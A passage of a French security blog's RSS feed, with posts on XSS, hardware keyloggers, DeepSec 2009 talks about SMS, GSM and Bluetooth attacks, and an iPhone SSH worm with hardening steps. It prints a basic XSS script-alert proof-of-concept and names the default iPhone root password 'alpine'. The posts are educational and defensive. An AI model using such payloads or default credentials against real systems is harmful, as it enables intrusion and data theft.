<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Kaizer Onion &#124; Think thoroughly about &#187; Security</title>
	<atom:link href="http://www.kaizeronion.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.kaizeronion.com</link>
	<description>Think thoroughly about by Franck Wurtz</description>
	<lastBuildDate>Tue, 27 Jul 2010 21:59:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Les failles XSS de la brise à l&#8217;Ouragan</title>
		<link>http://www.kaizeronion.com/security/les-failles-xss-de-la-brise-a-louragan-673/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=les-failles-xss-de-la-brise-a-louragan</link>
		<comments>http://www.kaizeronion.com/security/les-failles-xss-de-la-brise-a-louragan-673/#comments</comments>
		<pubDate>Fri, 02 Jul 2010 23:00:26 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[cross site scripting]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=673</guid>
		<description><![CDATA[Parfois anodine et peu connu des internautes, ces failles permettent bien souvent d&#8217;accéder à des données personnels de l&#8217;utilisateur dans des scenario aboutis. Pour autant cette vulnérabilité n&#8217;est pas récente, c&#8217;est là que le paradoxe prends son sens. Mais qu&#8217;est ce que le XSS ? Le XSS, de l&#8217;anglais cross site scripting, consiste à injecter [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Parfois anodine et peu connu des internautes, ces failles permettent bien souvent d&#8217;accéder à des données personnels de l&#8217;utilisateur dans des scenario aboutis. Pour autant cette vulnérabilité n&#8217;est pas récente, c&#8217;est là que le paradoxe prends son sens.</p>
<p style="text-align: justify;">Mais qu&#8217;est ce que le XSS ?<br />
Le XSS, de l&#8217;anglais cross site scripting, consiste à injecter et faire interpréter ou mieux, faire exécuter du code non attendu à un navigateur web. De cette définition, on peut en déduire que l&#8217;attaque ne se situe pas du côté du serveur mais plus plutôt du côté client, en d&#8217;autres termes une action du client final est nécessaire. Donc nous avons un aspect ingénierie sociale. De plus, ce genre d&#8217;attaque ne se limite pas à un langage. Tout langage reconnu par votre navigateur peut être exploité. C&#8217;est pourquoi les failles XSS sont souvent basées sur de l&#8217;HTML et du Javascript. Pour finir la première partie de sensibilisation, la vulnérabilité XSS figurait à la première place du top ten de l&#8217;<a href="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">OWASP</a> en 2007. En 2010 il occupe la seconde place.</p>
<p style="text-align: justify;">Prenons un exemple concret, vous recevez un mail de votre banque qui vous indique que de nouveaux documents sont disponibles à partir de votre compte et ils vous donnent un lien pour accéder aux ressources. En tant qu&#8217;utilisateur vous ne fait pas attention à l&#8217;url caché derrière le nom du lien et vous cliquez pour accéder à vos documents. A ce moment précis le mal est fait ! Vous ne vous êtes rendu compte de rien du tout mais votre requête à été intercepté par un autre site qui a volé vos identifiant de votre banque. Vous n&#8217;avez rien remarqué car vous avez été redirigé. Ce scenario semble sortir tout droit d&#8217;un James Bond, malheureusement, il est bien plus probable qu&#8217;un des scénarios de James Bond. Bien entendu, il y a quelques conditions. Ce scénario considère que le site de votre banque contient un champ vulnérable aux attaques XSS, que l&#8217;attaquant connaisse votre adresse mail, et qu&#8217;il ait un serveur distant ou il pourra stocker vos identifiants de connexion. Il est considéré également pour acquis que vos identifiants soit stockés dans un cookie. Vous me direz que cela fait beaucoup de conditions, même si la dernière est peu répandu (surtout pour un site bancaire) les autres conditions sont facilement réalisables.</p>
<p style="text-align: justify;">Voici une schématisation du scénario énoncé.</p>
<p style="text-align: justify;">
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/xssbillet.png"><img class="aligncenter size-medium  wp-image-1035" title="scenarioxss" src="http://www.kaizeronion.com/wp-content/uploads/xssbillet-300x208.png" alt="" width="300" height="208" /></a></center></p>
<p style="text-align: justify;">Alors comment fonctionne concrètement cross site scripting, et bien la syntaxe la plus connue est l&#8217;exécution dans un champ non validé du code suivant :</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;script&gt;alert('Hello World')&lt;/script&gt;</pre></div></div>

</p>
<p style="text-align: justify;">Il a pour but une fois interprété par votre navigateur, d&#8217;afficher la pop up suivante :</p>
<p style="text-align: justify;">
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/Screen-shot-2010-07-03-at-00.31.21.png"><img class="aligncenter size-full wp-image-1050" title="Screen shot 2010-07-03 at 00.31.21" src="http://www.kaizeronion.com/wp-content/uploads/Screen-shot-2010-07-03-at-00.31.21.png" alt="" width="411" height="136" /></a></center></p>
<p style="text-align: justify;">C&#8217;est exemple est souvent utilisé comme PoC (Proof of Concept). Mais il existe beaucoup plus de combinaison possible. Ce billet n&#8217;a pas pour vocation de faire une liste exhaustive des éléments à parser dans vos champs. Il existe de très bonnes sources si vous cherchez ce genre d&#8217;information, comme par exemple le site <a href="http://ha.ckers.org/xss.html">ha.ckers.org</a>. Cependant il faut comprendre que ce genre d&#8217;attaque est bien plus dangereuse pour l&#8217;utilisateur final que pour les serveurs. Grâce à l&#8217;utilisation de champ ou de paramètre non validé, il est possible également de ré-écrire une page web (via l&#8217;API DOM). Je vous invite à lire l&#8217;article de Pierre Gardenat qui a été publié récemment dans le magazine français MISC (édition Mai/Juin 2010). L&#8217;article est très bien détaillé. Je me suis permis de reprendre son titre que j&#8217;aime beaucoup. J&#8217;espère qu&#8217;il ne m&#8217;en voudra pas.</p>
<p>&#8211;<br />
<em>source</em><br />
<a href="http://actes.sstic.org/SSTIC09/XSS-_de_la_brise_a_louragan/SSTIC09-article-P-Gardenat-XSS-_de_la_brise_a_louragan.pdf">Pierre Gardenat &#8211; XSS : de la brise à l&#8217;ouragan</a></p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Les+failles+XSS+de+la+brise+%C3%A0+l%E2%80%99Ouragan+http://x2otf.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Les+failles+XSS+de+la+brise+%C3%A0+l%E2%80%99Ouragan+http://x2otf.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/les-failles-xss-de-la-brise-a-louragan-673/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Keylogger matériel &#8211; une sérieuse menace</title>
		<link>http://www.kaizeronion.com/security/keylogger-materiel-une-serieuse-menace-943/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=keylogger-materiel-une-serieuse-menace</link>
		<comments>http://www.kaizeronion.com/security/keylogger-materiel-une-serieuse-menace-943/#comments</comments>
		<pubDate>Thu, 25 Mar 2010 20:46:01 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Key Ghost]]></category>
		<category><![CDATA[Keylogger]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=943</guid>
		<description><![CDATA[A chaque fois que je fais une démonstration en sortant mes keyloggers, les gens sont toujours étonnés. Malheureusement, c&#8217;est la dure réalité de la vie, les keyloggers sont une véritable menace pour les sociétés et les individus. Leur unique but est d&#8217;enregistrer toutes les touches saisies sur le clavier par l&#8217;utilisateur et de les rendre [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">A chaque fois que je fais une démonstration en sortant mes keyloggers, les gens sont toujours étonnés. Malheureusement, c&#8217;est la dure réalité de la vie, les keyloggers sont une véritable menace pour les sociétés et les individus. Leur unique but est d&#8217;enregistrer toutes les touches saisies sur le clavier par l&#8217;utilisateur et de les rendre disponible à l&#8217;attaquant.</p>
<p style="text-align: justify;">Il existe deux classes de keylogger, les versions matérielles et logicielles. La version matérielle est vraiment très simple à mettre en place. On peut imaginer différents scenarios, il suffit d&#8217;avoir accès physiquement à la machine pendant quelques secondes. Vous allez me dire que cela  fonctionne uniquement avec les versions filaires, mais malheureusement non ! Il existe aussi des versions de keylogger capable d&#8217;intercepter les informations envoyées en bluetooth. Il est difficile pour un utilisateur de remarquer ce genre d&#8217;intervention.</p>
<p><strong>La version logiciel</strong></p>
<p style="text-align: justify;">Souvent les fonctionnalités offerte par ce genre de keylogger sont plus diversifiées car ils permettent d&#8217;une part d&#8217;obtenir tout ce  que vous tapez sur votre clavier mais également de savoir quels logiciels vous utilisez. De plus, ils permettent de capturer vos flux audio et vidéo. L&#8217;inconvénient de ce genre de keylogger c&#8217;est qu&#8217;il commence à enregistrer seulement une fois votre système d&#8217;exploitation démarré. Ce qui vous empêche d&#8217;obtenir les mots de passe BIOS, ou encore les mots de passe d&#8217;encryption de disque dur. Ce genre de keylogger est facilement détectable si vous avez un antivirus digne de ce nom. Pour information les force jaune, force bleu et force rouge détectent facilement ce genre de logiciel (à comprendre Symantec, Checkpoint et McAfee).</p>
<p><strong>La version matériel</strong></p>
<p style="text-align: justify;">Cela ressemble la plus part du temps à un clé USB, cela se branche entre votre clavier et votre ordinateur. Il existe des modèles PS2 et USB. La marque la plus reconnu dans le domaine est <a href="http://www.keyghost.com/">Key Ghost</a>. Personnellement, j&#8217;ai la version KeyGhost SX 512 Ko et KeyGhost USB. Ce qu&#8217;il faut savoir, c&#8217;est qu&#8217;il n&#8217;existe actuellement aucun logiciel de sécurité capable de faire de la prévention de keylogger sur le port PS2. Donc si vous utilisez encore des claviers PS2 je vous conseille vivement de changer de clavier. En ce qui concerne les claviers USB, lorsque vous le connectez, votre clavier fait une entrée dans votre base de registre avec un HID qui est propre à votre clavier. Si maintenant vous connectez un hub USB et ensuite votre clavier, vous allez voir que cette valeur va changer. C&#8217;est précisement sur ce paramètre que les logiciels de sécurité se basent afin de faire la prévention. Vous comprendrez que ce système à ces limitations car si vous changez de clavier, le logiciel va penser que vous avez un keylogger de connecté. Cependant la manière de faire la plus sûre. Vous aurez compris que ce genre de keylogger a un grand avantage (ou inconvénient tout dépend comment l&#8217;on se place) car ils permettent de capturer à n&#8217;importe quel moment les touches saisies sur votre clavier. Et ceci indépendamment de votre système d&#8217;exploitation. Il existe également des keyloggers matérielles pour les ordinateurs portables, allez jeter un coup d&#8217;oeil sur le site web de <a href="www.keycarbon.com">www.keycarbon.com</a>, c&#8217;est assez impressionnant.</p>
<p style="text-align: justify;">Avec l&#8217;arrivée en masse des claviers bluetooth, il était normal de voir débarquer les keyloggers bluetooth. Avec ce genre de keylogger vous êtes capable de capturer des informations jusqu&#8217;à 300 mètres de distance. A ce sujet j&#8217;ai assisté à une présentation de ce genre d&#8217;attaque pendant la conférence <a href="http://www.kaizeronion.com/security/deepsec-day-4-732/">DeepSec </a>à Vienne. L&#8217;équipe remote-exploit nous présenté leur projet <a href="http://http://www.remote-exploit.org/?page_id=187">KeyKeriki</a>. Pour rappel, il nous montré avec quel facilité ils étaient capable d&#8217;envoyer des informations à un récepteur bluetooth de marque Microsoft.</p>
<p><a href="http://www.kaizeronion.com/wp-content/uploads/wireless.gif"><img class="aligncenter size-full wp-image-967" title="wireless" src="http://www.kaizeronion.com/wp-content/uploads/wireless.gif" alt="" width="610" height="120" /></a></p>
<p>&#8211;<br />
Sources</p>
<p><a href="http://www.keycarbon.com">http://www.keycarbon.com</a><br />
<a href="http://www.keyghost.com">http://www.keyghost.com</a><br />
<a href="http://www.wirelesskeylogger.com">http://www.wirelesskeylogger.com</a><br />
<a href="http://en.wikipedia.org/wiki/Keystroke_logging">http://en.wikipedia.org/wiki/Keystroke_logging</a><br />
<a href="http://www.remote-exploit.org/?page_id=187">http://www.remote-exploit.org/?page_id=187</a></p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Keylogger+mat%C3%A9riel+%E2%80%93+une+s%C3%A9rieuse+menace+http://d4daw.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Keylogger+mat%C3%A9riel+%E2%80%93+une+s%C3%A9rieuse+menace+http://d4daw.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/keylogger-materiel-une-serieuse-menace-943/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DeepSec Day #4</title>
		<link>http://www.kaizeronion.com/security/deepsec-day-4-732/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=deepsec-day-4</link>
		<comments>http://www.kaizeronion.com/security/deepsec-day-4-732/#comments</comments>
		<pubDate>Sun, 22 Nov 2009 17:58:48 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[DeepSec]]></category>
		<category><![CDATA[GSM]]></category>
		<category><![CDATA[SMS attacking]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=732</guid>
		<description><![CDATA[Dernier jour de la conférence, on commence par Zane Lackey et Luis Miras de iSEC Partners qui nous présentent comment peut on prendre le contrôle d&#8217;un GSM à distance en utilisant les SMS. Le principe est simple, on envoie une notification à une personne pour un changement de paramètre, la personne accepte les nouveaux paramètres [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Dernier jour de la conférence, on commence par Zane Lackey et Luis Miras de <a href="https://www.isecpartners.com/">iSEC Partners</a> qui nous présentent comment peut on prendre le contrôle d&#8217;un GSM à distance en utilisant les SMS. Le principe est simple, on envoie une notification à une personne pour un changement de paramètre, la personne accepte les nouveaux paramètres et vous obtenez toutes les informations que vous voulez. Techniquement c&#8217;est en modifiant le payload du SMS qu&#8217;ils arrivent à insérer du code malicieux. Ils nous ont fait une petite démo live assez cool. Vous trouverez les slides de leur présentation <a href="http://www.kaizeronion.com/wp-content/uploads/BHUSA09-Lackey-AttackingSMS-SLIDES.pdf">ici</a>. (ils avaient déjà fait leur show à la Black Hat cet été).</p>
<p style="text-align: justify;">A croire que la journée était dédiée aux GSM, car le talk suivant présenté par Karsten Nohl, nous expliquait comment il était facile de décrypter l&#8217;encryption des communications GSM. Dans un premier temps, la méthode dite active consiste à proposer au téléphone un relai avec un très bon signal afin de le forcer à se connecter dessus (nécessite de la proximité). Une fois connecté, toutes les communications du téléphone peuvent être écoutées. La seconde méthode dite passive, n&#8217;est pas encore au point face à l&#8217;encryption <a href="http://fr.wikipedia.org/wiki/A5/1">A5/1</a>. Le principe est similaire à du brute force à l&#8217;aide de rainbows tables. D&#8217;ailleurs si vous souhaitez les aider dans leurs travaux, vous pouvez toujours proposer vos services en contactant <a href="mailto:nohl@virginia.edu">Karsten Nohl</a>. Ils possédent une <a href="http://lists.lists.reflextor.com/cgi-bin/mailman/listinfo/a51">mailing list</a> pour rester au courant de leur progession et aussi un <a href="http://www.h-online.com/security/features/Cheap-Cracks-Of-dictionaries-and-rainbows-746217.html">site web</a> qui donne un peu plus d&#8217;explications sur leur recherche.</p>
<p style="text-align: justify;">Le talk suivant présenté par Thorsten Schröder de <a href="http://www.remote-exploit.org/">Remote-Exploit.org</a> portait sur l&#8217;écoute des communications de clavier Bluetooth. La présentation était très intéressant, notamment on y apprends que les claviers Bluetooth de Microsoft sont composés de puces AES qui leurs permettraient d&#8217;assurer une meilleure sécurité de la communication mais ils continuent d&#8217;utiliser une méthode basée sur des contrôles XOR. Il nous démontre, à l&#8217;aide d&#8217;un petit émetteur Bluetooth fait maison, comment il arrive envoyer une série de commandes sur un récepteur Bluetooth Microsoft. Vous trouverez en ligne <a href="http://www.remote-exploit.org/Keykeriki.html">la démo</a> ainsi que des explications sur la méthode utilisée.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/bluetooth.jpg"><img src="http://www.kaizeronion.com/wp-content/uploads/bluetooth-300x225.jpg" alt="bluetooth" title="bluetooth" width="300" height="225" class="aligncenter size-medium wp-image-747" /></a></center></p>
<p style="text-align: justify;">Le dernier talk de la matinée présenté par deux italiens a définitivement clôturé les présentations intéressantes (du moins pour ma part). En effet, l&#8217;après midi n&#8217;était pas aussi intéressante en termes de sujet (les sujets abordés m&#8217;intéressais moins). Revenons à la présentation des italiens, qui reprenait en grande partie les travaux de Zane et Luis mais d&#8217;une manière différente. Ils ont montré comment ils arrivent à changer à distance, via un SMS, l&#8217;APN du téléphone cible. Une fois l&#8217;APN changé (un APN proxy), ils arrivent à voir toutes les trames HTTP et HTTPS du client. Le téléphone cible n&#8217;a plus aucun secret pour eux. Assez terrifiant &#8230;</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/deepsec.png"><img class="aligncenter size-medium wp-image-688" title="deepsec" src="http://www.kaizeronion.com/wp-content/uploads/deepsec-300x48.png" alt="deepsec" width="300" height="48" /></a></center></p>
<p style="text-align: justify;">La conférence DeepSec édition 2009 s&#8217;est clôturée sur une soirée au Metalab ou tout le monde étaient conviés. C&#8217;était l&#8217;occasion pour lancer quelques lightening talk (des présentations de courte durée). Le sujet principal était le recensement des pirateries effectués durant la conférence à l&#8217;hôtel :</p>
<ul>
<li>Connexion internet pour 1 euros en utilisant un champ caché</li>
<li>La capture des trames TCP des caméras de surveillance sur un réseau sans fils non protégé</li>
<li>L&#8217;accès au menu de la TV payante de l&#8217;hôtel via un code disponible chez le constructeur</li>
</ul>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+DeepSec+Day+%234+http://i8ad8.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+DeepSec+Day+%234+http://i8ad8.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/deepsec-day-4-732/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Un ver dans la pomme</title>
		<link>http://www.kaizeronion.com/security/un-ver-dans-la-pomme-713/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=un-ver-dans-la-pomme</link>
		<comments>http://www.kaizeronion.com/security/un-ver-dans-la-pomme-713/#comments</comments>
		<pubDate>Sun, 22 Nov 2009 11:14:10 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[iPhone]]></category>
		<category><![CDATA[Iphone ver]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[root]]></category>
		<category><![CDATA[SSH]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=713</guid>
		<description><![CDATA[Pour les personnes qui auraient jailbreakés leur iPhone et installés OpenSSH, je vous invite fortement à suivre ce petit tuto. Actuellement sur la toile tourne un ver qui impacte tous les iPhones jailbreakés qui ont installé openSSH. En effet, il utilise le mot de passe par défaut (alpine) du compte root pour se connecter à [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Pour les personnes qui auraient jailbreakés leur iPhone et installés OpenSSH, je vous invite fortement à suivre ce petit tuto.<br />
Actuellement sur la toile tourne un ver qui impacte tous les iPhones jailbreakés qui ont installé openSSH. En effet, il utilise le mot de passe par défaut (alpine) du compte root pour se connecter à votre iPhone via SSH et changer votre fond d&#8217;écran. A l&#8217;origine le ver a été conçu par un australien de 21 ans pour sensibiliser les utilisateurs à la gravité de la faille de sécurité, mais depuis le ver a été repris et ne se contente plus de changer votre fond d&#8217;écran, il vous vole la liste de vos contacts, vos mails, vos SMS et tout autre donnée disponible. Pour éviter d&#8217;avoir sa liste de contacts sur le web, je vous recommande de changer le mot de passe du compte root et de bloquer l&#8217;accès à SSH pour l&#8217;utilisateur mobile. D&#8217;un point de vue sécurité, l&#8217;idéal serait de bloquer l&#8217;accès direct au compte root et de créer un compte utilisateur autorisé à se connecter au serveur SSH.</p>
<p>Dans un premier temps, changez le mot de passe du compte root en utilisant le terminal ou par SSH:</p>
<div class="codesample"># passwd <br />  New password:<br />  Retype new password: </div>
<p>Ensuite, éditez le fichier de configuration de votre serveur SSH afin de bloquer l&#8217;accès au serveur pour le compte mobile :</p>
<div class="codesample"># vi /etc/ssh/sshd_config</div>
<p>Allez à la fin du document avec la commande &#8220;: $&#8221;, passez en mode édition avec &#8220;: i&#8221; puis insérez la ligne suivante :</p>
<div class="codesample">DenyUsers mobile</div>
<p>Sauvegardez avec la commande &#8220;: wq&#8221;.</p>
<p>Et voilà le tour est joué, votre iPhone est maintenant sécurisé.</p>
<p align="left"><a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Un+ver+dans+la+pomme+http://fo5yw.th8.us" title="Twitter ce billet"><img class="nothumb" src="http://www.kaizeronion.com/wp-content/plugins/tweet-this/icons/tt-twitter.png" alt="Post to Twitter" /></a> <a target="_blank" class="tt" href="http://twitter.com/home/?status=Lu+chez+@kaizeronion+-+Un+ver+dans+la+pomme+http://fo5yw.th8.us" title="Twitter ce billet">Twitter ce billet</a></p>]]></content:encoded>
			<wfw:commentRss>http://www.kaizeronion.com/security/un-ver-dans-la-pomme-713/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DeepSec Day #2 &amp; #3</title>
		<link>http://www.kaizeronion.com/security/conference/deepsec-day-2-3-697/#utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=deepsec-day-2-3</link>
		<comments>http://www.kaizeronion.com/security/conference/deepsec-day-2-3-697/#comments</comments>
		<pubDate>Fri, 20 Nov 2009 07:37:35 +0000</pubDate>
		<dc:creator>Franck</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[DeepSec]]></category>
		<category><![CDATA[John Walton]]></category>
		<category><![CDATA[Morgan Mayhem]]></category>
		<category><![CDATA[Saumil Shah]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.kaizeronion.com/?p=697</guid>
		<description><![CDATA[Le workshop s&#8217;est terminé hier soir, et j&#8217;avoue que je n&#8217;étais plus motivé pour écrire un billet. La soirée a été calme, mise à part une petite visite du Marché de Noël ou nous avons mangé un sandwich à la raclette et quelques photos prisent de nuit, nous sommes rapidement retourné à l&#8217;hôtel. Pour en [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Le workshop s&#8217;est terminé hier soir, et j&#8217;avoue que je n&#8217;étais plus motivé pour écrire un billet. La soirée a été calme, mise à part une petite visite du Marché de Noël ou nous avons mangé un sandwich à la raclette et quelques photos prisent de nuit, nous sommes rapidement retourné à l&#8217;hôtel.</p>
<p style="text-align: justify;">Pour en revenir au Workshop, la dernière journée a été très intéressante, nous avons pu nous exercer sur différentes vulnérabilités comme les failles XSS/XSRF, les injections SQL ou encore les manipulations JSON. Nous avons vu également comment décompiler du Flash et comment obtenir le code source d&#8217;application réalisée avec <a href="http://fr.wikipedia.org/wiki/Silverlight">Silverlight</a>. Pendant une bonne partie de la journée les deux sites Web (un site de commerce de DVDs et une application bancaire) mis à disposition ont subi toutes les attaques possibles. Nous avons fait la connaissance du Framework <a href="http://www.bindshell.net/tools/beef/">BeEF</a> qui s&#8217;est révélé très utile pour concrétiser des attaques de type XSS.</p>
<p>Entre temps, en discutant avec d&#8217;autres personnes, nous avons obtenu la connexion internet de l&#8217;hôtel pour 1 euros en exploitant un champ caché <img src='http://www.kaizeronion.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> . D&#8217;autres se sont amusés à capturer les trames TCP des caméras de surveillance isolées sur un réseau sans fil sans protection.</p>
<p style="text-align: justify;">Aujourd&#8217;hui, c&#8217;était la première journée de conférence. Il y a deux salles soit deux sessions simultanées. Comme d&#8217;habitude, il faut bien choisir son talk sous peine de subir 50 minutes de &#8230;<br />
Je ne sais pas si j&#8217;ai bien choisi mes talks ou si tous les speakers étaient bon (à quelques exceptions près&#8230;) mais je n&#8217;ai pas été déçu par la qualité des speakers.</p>
<p style="text-align: justify;">La première session que j&#8217;ai suivi fut le Top 10 des problèmes de sécurité dont les développeurs ne se doutent pas. Présenté par Neelay S. Shah de chez Foundstone, la présentation était accès sur des attaques dont la plus part nécessite un accès à la machine. Petite anomalie, la présentation contenait 9 et pas 10 attaques (j&#8217;en ai peut être raté une, faut dire qu&#8217;il était <del datetime="2009-11-19T17:06:12+00:00">10h</del>&#8230; non faut pas le dire). Voici la liste que j&#8217;ai recensé peut être que quelqu&#8217;un me dira si j&#8217;en ai oublié :</p>
<ul>
<li><a href="http://www.foundstone.com/us/resources/whitepapers/wp_socket_hijacking.pdf">Socket Hijacking</a></li>
<li><a href="http://en.wikipedia.org/wiki/Named_pipe">Using named pipes</a></li>
<li>Mutex/Events</li>
<li>Insecure Process Creation</li>
<li>Cipher modes</li>
<li>Insecure Integrity Checking</li>
<li>ActiveX Controls</li>
<li>Third Party Components</li>
<li>Thick Client Applications</li>
</ul>
<p>Dans l&#8217;ensemble la présentation était bien mais loin d&#8217;être la meilleure.</p>
<p style="text-align: justify;">Le speech suivant était présenté par <a href="http://saumil.net/">Saumil Shah</a> qui travaille pour <a href="http://www.net-square.com">net-square</a> dont il est le fondateur. Sa présentation, intitulé <em>Ownage 2.0</em>, portait sur les différentes menaces du Web 2.0. Très humoristique, on sent qu&#8217;il est à l&#8217;aise avec l&#8217;auditoire. Il commence à introduire son speech par l&#8217;évolution des applications web, qui en résumé sont de plus en plus complexe avec des utilisateurs de moins en moins informés. Il avait un joli slide pour montrer que les attaques prennent de plus en plus la route du port 80. Il nous démontre avec facilité comment nous pouvons être vulnérable avec des fichiers PDF (installation d&#8217;une barre d&#8217;outil dans le navigateur à l&#8217;ouverture du PDF).</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/saumil.jpg"><img class="aligncenter size-medium wp-image-708" title="saumil" src="http://www.kaizeronion.com/wp-content/uploads/saumil-300x225.jpg" alt="saumil" width="300" height="225" /></a></center></p>
<p style="text-align: justify;">Felix Gröbert nous présente son Proof of Concept d&#8217;une attaque basé sur un smart card reader de classe 1 utilisé par une application bancaire de la CommerzBank. La technique utilisée repose sur la condition d&#8217;utiliser une vieille version de FireFox (1.5).</p>
<p style="text-align: justify;"><em>Cloud Services &#8211; still too cloudy for take off?</em> est l&#8217;intitulé de la présentation de Kurt Kammerer. Il travaille pour <a href="http://www.regify.com/">Regify</a>. Il explique les comportements des différents acteurs d&#8217;un service informatique par rapport aux coûts et aux projets. Le sujet me semble pas coller avec la sécurité mais bon sa présentation illustrée de photos comique a provoqué plus d&#8217;une question. La dernière image de sa présentation que je garde à l&#8217;esprit c&#8217;est la photo d&#8217;un renard avec une cicatrice qui représente l&#8217;IT manager, un chien enragé qui représente le CEO et un chien de race Husky avec le regard vide représentant le CFO. Voici l&#8217;image de son dernier slide qui résume bien sa présentation.</p>
<p><center><a href="http://www.kaizeronion.com/wp-content/uploads/deepsec-cloudservices.png"><img src="http://www.kaizeronion.com/wp-content/uploads/deepsec-cloudservices-300x230.png" alt="" title="deepsec-cloudservices" width="300" height="230" class="aligncenter size-medium wp-image-836" /></a></center></p>
<p style="text-align: justify;"><em>Get Your head out of the clouds : Security in software-plus-services</em><br />
Ce talk était digne d&#8217;un commercial. John Walton de chez Microsoft nous a présenté les différents services revendu par Microsoft et surtout leurs intérêts. Un peu trop de marketing pour moi &#8230; mais bon il en faut pour tous les GÜ <img src='http://www.kaizeronion.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> .</p>
<p style="text-align: justify;">Pendant la pause, nous avons profité du stand de Lockpicking pour s&#8217;exercer un peu. J&#8217;ai enfin pu m&#8217;essayer au <a href="http://www.lockpickingfrance.org/bumpkey.html">bumping</a>. Pour information, le bumping est une technique de lockpicking qui permet d&#8217;ouvrir des serrures en frappant la clé.</p>
<p style="text-align: justify;">Morgan Mayhem connu sous le pseudonyme <em><strong>headhntr</strong></em> nous a présenté les vulnérabilités de mac OSX (<em>The Kingdom of the blind: OSX Incident Response</em>). Cet américain, qui travaille pour Google dans leur bureau de Zurich, est venu sur l&#8217;estrade avec des airs de Jack Sparrow. Pendant sa présentation, une bière à la main, il a sensibilisé les personnes aux risques d&#8217;utilisation de Mac OSX. Il a surtout cassé le mythe en montrant les différents malware développé pour OSX.</p>
<p style="text-align: justify;">Le dernier talk que j&#8217;ai suivi était sur les risques de Twitter. <a href="http://benfeinstein.net/">Ben Fenstein</a> nous a montré les différents risque que comporte Twitter en commençant par les failles XSS jusqu&#8217;au Bot C&amp;C. Présentation intéressante.</p>
